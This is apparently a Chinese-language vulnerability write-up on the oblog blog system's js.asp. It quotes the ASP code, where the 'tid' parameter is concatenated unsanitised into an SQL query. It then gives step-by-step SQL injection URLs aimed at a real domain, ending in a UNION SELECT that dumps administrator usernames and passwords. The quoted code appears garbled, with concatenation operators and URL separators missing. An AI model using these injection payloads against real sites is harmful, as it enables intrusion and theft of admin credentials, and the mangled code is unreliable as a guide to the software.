漏洞文件:js.asp % Dim oblog set oblog=new class_sys oblog.autoupdate=False oblog.start dim js_blogurl,n js_blogurl=Trim(oblog.CacheConfig(3)) n=CInt(Request(”n”)) if n=0 then n=1 select case CInt(Request(”j”)) case 1 call tongji() case 2 call topuser() case 3 call adduser() case 4 call listclass() case 5 call showusertype() case 6 call listbestblog() case 7 call showlogin() case 8 call showplace() case 9 call showphoto() case 10 call showblogstars() Case 11 Call show_hotblog() Case 12 Call show_teams() Case 13 Call show_posts() Case 14 Call show_hottag() case 0 call showlog() end select ****************省略部分代码****************** Sub show_posts() Dim teamid,postnum,l,u,t teamid=Request(”tid”) postnum=n l=CInt(Request(”l”)) u=CInt(Request(”u”)) t=CInt(Request(”t”)) Dim rs,sql,sRet,sAddon Sql=”select Top ” postnum ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ” If teamid>“” And teamid>“0″ Then teamid=Replace(teamid,”|”,”,”) Sql=Sql ” And teamid In (” teamid “) ” End If Sql=Sql ” order by postid Desc” Set rs=oblog.Execute(Sql) sRet=”
” Do While Not rs.Eof sAddon=”" * sRet=sRet “ ” oblog.Filt_html(Left(rs(2),l)) “” If u=1 Then sAddon=rs(4) if t=1 Then If sAddon>“” Then sAddon=sAddon “,” sAddon=sAddon rs(3) End If If sAddon>“” Then sAddon=”(” sAddon “)” sRet=sRet sAddon “
” rs.Movenext Loop Set rs = Nothing sRet=sRet “
” Response.write oblog.htm2js (sRet,True) End Sub 调用show_posts()过程必须要符合上面的参数n=1,j=13 (” teamid “) http://www.oblog.com.cn/js.asp?n=1j=13tid=1 http://www.oblog.com.cn/js.asp?n=1j=13tid=1) and 1=1 and (1=1 返回正常 http://www.oblog.com.cn/js.asp?n=1j=13tid=1) and 1=1 and (1=2 返回异常 猜管理员表名 http://www.oblog.com.cn/js.asp?n=1j=13tid=1) and 查询语句 and (1=1
Sql=”select Top ” postnum ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
http://www.oblog.com.cn/js.asp?n=1j=13tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1
document.write('
*
‘);
gid=1跟pid=2里的1,2就是了 直接替换里面的1,2为username,password
http://www.oblog.com.cn/js.asp?n=1j=13tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1
